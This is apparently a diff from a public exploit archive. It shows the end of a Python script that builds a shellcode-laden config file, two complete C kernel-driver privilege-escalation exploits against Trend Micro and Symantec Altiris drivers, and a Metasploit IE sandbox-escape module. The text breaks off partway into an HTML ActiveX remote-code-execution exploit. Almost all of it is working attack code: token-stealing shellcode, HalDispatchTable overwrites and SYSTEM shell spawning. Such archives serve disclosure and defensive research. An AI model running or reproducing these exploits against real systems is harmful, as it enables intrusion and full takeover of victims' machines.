"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
poc="\n" + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +"\n\n"
buffer2 = "\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48\x3d\x2e"
buffer2 += "\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33\x30\x30\x0a\x0a"
buffer2 += "\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54"
buffer2 += "\x3d\x32\x30\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53"
buffer2 += "\x79\x73\x3d\x31\x0a"
exploit = buffer1 + poc + buffer2
try:
out_file = open("UpdateCfg.ini",'w')
out_file.write(exploit)
out_file.close()
except:
print "Error"

302
platforms/windows/local/35962.c Executable file
View file

@ -0,0 +1,302 @@
?/*
Exploit Title - Trend Micro Multiple Products Arbitrary Write Privilege Escalation
Date - 31st January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.trendmicro.co.uk/
Tested Version - 8.0.1133
Driver Version - 2.0.0.1009 - tmeext.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/115514
CVE ID - CVE-2014-9641
Vendor fix url - http://esupport.trendmicro.com/solution/en-US/1106233.aspx
Fixed version - 8.0.1133
Fixed driver ver - 2.0.0.1015
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" Trend Micro Multiple Products (tmeext.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "tmnethk");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00222400, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}

384
platforms/windows/local/35964.c Executable file
View file

@ -0,0 +1,384 @@
?/*
Exploit Title - Symantec Altiris Agent Arbitrary Write Privilege Escalation
Date - 01st February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.symantec.com
Tested Version - 6.9 (Build 648)
Driver Version - No version set - AlKernel.sys
Tested on OS - 32bit Windows XP SP3 and Windows Server 2003 SP2
OSVDB - http://www.osvdb.org/show/osvdb/116082
CVE ID - CVE-2014-7286
Vendor fix url - http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141219_00
Fixed version - To remove driver
Fixed driver ver - n/a
Note
----
Overwritten HAL dispatch table after exploit
kd> dps nt!HalDispatchTable l c
8054ccb8 00000003
8054ccbc 746f6353
8054ccc0 6f725774
8054ccc4 68546574
8054ccc8 00217369
8054cccc 8050ac4d nt!HalExamineMBR
8054ccd0 805c6f89 nt!IoAssignDriveLetters
8054ccd4 805c4ae5 nt!IoReadPartitionTable
8054ccd8 80613f7b nt!IoSetPartitionInformation
8054ccdc 806141ef nt!IoWritePartitionTable
8054cce0 8052d157 nt!CcHasInactiveViews
8054cce4 804e42d1 nt!ObpTraceDepth+0x19
4 pointers are overwritten with the hardcoded string "ScottWroteThis!" set in the driver.
The driver looks like has one main task is to retrieve configuration information about
the hardware using the HalGetBusData function. If it cannot retrieve configuration
information it sends the "ScottWroteThis!" string to the output buffer.
Also to point out the driver is not signed, no file version set, no product version set,
no product name set.
Question about the string ""ScottWroteThis!" was posted online in 2006
http://mygreenpaste.blogspot.co.uk/2006/06/beam-me-up-scotty.html
*/
#include <stdio.h>
#include <windows.h>
#define INBUFSIZE 16
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows Server 2003
#define W2K3_KPROCESS 0x38 // Offset to _KPROCESS from a _ETHREAD struct
#define W2K3_TOKEN 0xd8 // Offset to TOKEN from the _EPROCESS struct
#define W2K3_UPID 0x94 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W2K3_APLINKS 0x98 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
BYTE token_steal_w2k3[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W2K3_KPROCESS, // mov eax, [eax+W2K3_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W2K3_TOKEN] Retrieves TOKEN
0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W2K3_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00, // sub eax, W2K3_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W2K3_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov [eax+W2K3_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
BYTE *inbuffer;
BYTE *shell;
LPVOID addrtoshell = (LPVOID)0x746f6353;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" Symantec Altiris Agent Arbitrary (alkernel.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 3)
{
printf("[i] Running Windows Server 2003\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "alkernel");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, INBUFSIZE);
shell = VirtualAlloc(addrtoshell, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(shell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", shell);
memset(addrtoshell, 0x90, BUFSIZE);
if (GetWindowsVersion() == 1)
{
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
if (GetWindowsVersion() == 3)
{
memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
}
printf("[+] Shellcode located at address 0x%.8x\n", addrtoshell);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00222000, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}

131
platforms/windows/local/35983.rb Executable file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info, {
'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in Internet Explorer's sandbox, specifically
the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape
the Protected Mode, and execute code with Medium Integrity. At the moment, this module only
bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested
successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # From Threat Intel of Symantec
'Henry Li', # Public vulnerability analysis
'juan vazquez' # Metasploit module
],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'Arch' => [ARCH_X86],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 30
},
'Targets' =>
[
[ 'Protected Mode (Windows 7) / 32 bits',
{
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
['CVE', '2015-0016'],
['MSB', 'MS15-004'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/']
],
'DisclosureDate' => 'Jan 13 2015'
}))
end
def check
temp = get_env('WINDIR')
dll_path = "#{temp}\\System32\\TSWbPrxy.exe"
win_ver = sysinfo['OS']
unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/
return Exploit::CheckCode::Safe
end
unless file_exist?(dll_path)
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
print_status('Checking target...')
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'System not vulnerable')
end
if session.platform !~ /^x86\//
fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment')
end
win_ver = sysinfo['OS']
if win_ver =~ /Windows 2012|Windows 8/
fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment')
end
print_status('Checking the Process Integrity Level...')
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, 'Not running at Low Integrity')
end
cmd = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true }
)
print_status('Storing payload on environment variable...')
cmd.gsub!('powershell.exe ','')
session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd)
print_status('Exploiting...')
temp = get_env('TEMP')
# Using the old meterpreter loader, if it's loaded with
# Reflective DLL Injection the exceptions in the sandbox
# policy won't apply.
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
'TargetFilePath' => temp + '\\cve-2015-0016.dll',
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def cleanup
session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil)
super
end
end

272
platforms/windows/remote/35948.html Executable file
View file

@ -0,0 +1,272 @@
<!DOCTYPE HTML>
<!--
###############################################################################
*
* Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass
* Author: Rh0
* Date: Jan 30 2015
* Affected Software: X360 VideoPlayer ActiveX Control 2.6 (VideoPlayer.ocx)
* Vulnerability: Buffer Overflow in Data Section
* Tested on: Internet Explorer 10 32-bit (Windows 7 64-bit in VirtualBox)
* Software Links:
http://www.x360soft.com/demo/videoplayersetup.exe
http://download.cnet.com/X360-Video-Player-ActiveX-Control/3000-2170_4-10581185.html
* Detailed writeup: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/
*
###############################################################################
* Information about VideoPlayer.ocx *
###################################
md5sum: f9f2d32ae0e4d7b5c19692d0753451fb
Class VideoPlayer
GUID: {4B3476C6-185A-4D19-BB09-718B565FA67B}
Number of Interfaces: 1
Default Interface: _DVideoPlayer
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
* NOTES *
#########
*) When passing an overlong string to the ActiveX object's "SetText" method, a
buffer overflow in the data section occurs. It allows overwriting a subsequent
pointer that can be used in a controlled memcpy when dispatching the object's
"SetFontName" method. With this arbitrary write, array structures can be
manipulated to gain access to complete process memory. Equipped with this
capability, necessary information can be leaked and manipulated to execute
arbitrary code remotely.
*) Comment in the alert messages to see some leaks ;)
*) This is PoC Code: If it does not work for you, clear IE's history and try
again. Tested against mshtml.dll and jscript9.dll version 10.0.9200.17183
*) Inspired by:
"http://blog.exodusintel.com/2013/12/09/a-browser-is-only-as-strong-as-its-weakest-byte-part-2/"
"http://ifsec.blogspot.de/2013/11/exploiting-internet-explorer-11-64-bit.html"
"https://cansecwest.com/slides/2014/The Art of Leaks - read version - Yoyo.pdf"
"https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf"
"https://github.com/exp-sky/HitCon-2014-IE-11-0day-Windows-8.1-Exploit/blob/master/IE 11 0day & Windows 8.1 Exploit.pdf"
-->
<html>
<body>
<button onclick=run()>runme</button>
<script>
function run(){
/* VideoPlayer.ocx image has the rebase flag set =>
It's mapped to another base per process run */
/* create its vulnerable ActiveX object (as HTMLObjectElement) */
var obj = document.createElement("object");
obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");
/* amount of arrays to create on the heap */
nrArrays = 0x1000
/* size of data in one array block: 0xefe0 bytes =>
subract array header (0x20) and space for typed array headers (0x1000)
from 0x10000 */
arrSize = (0x10000-0x20-0x1000)/4
/* heap array container will hold our heap sprayed data */
arr = new Array(nrArrays)
/* use one buffer for all typed arrays */
intArrBuf = new ArrayBuffer(4)
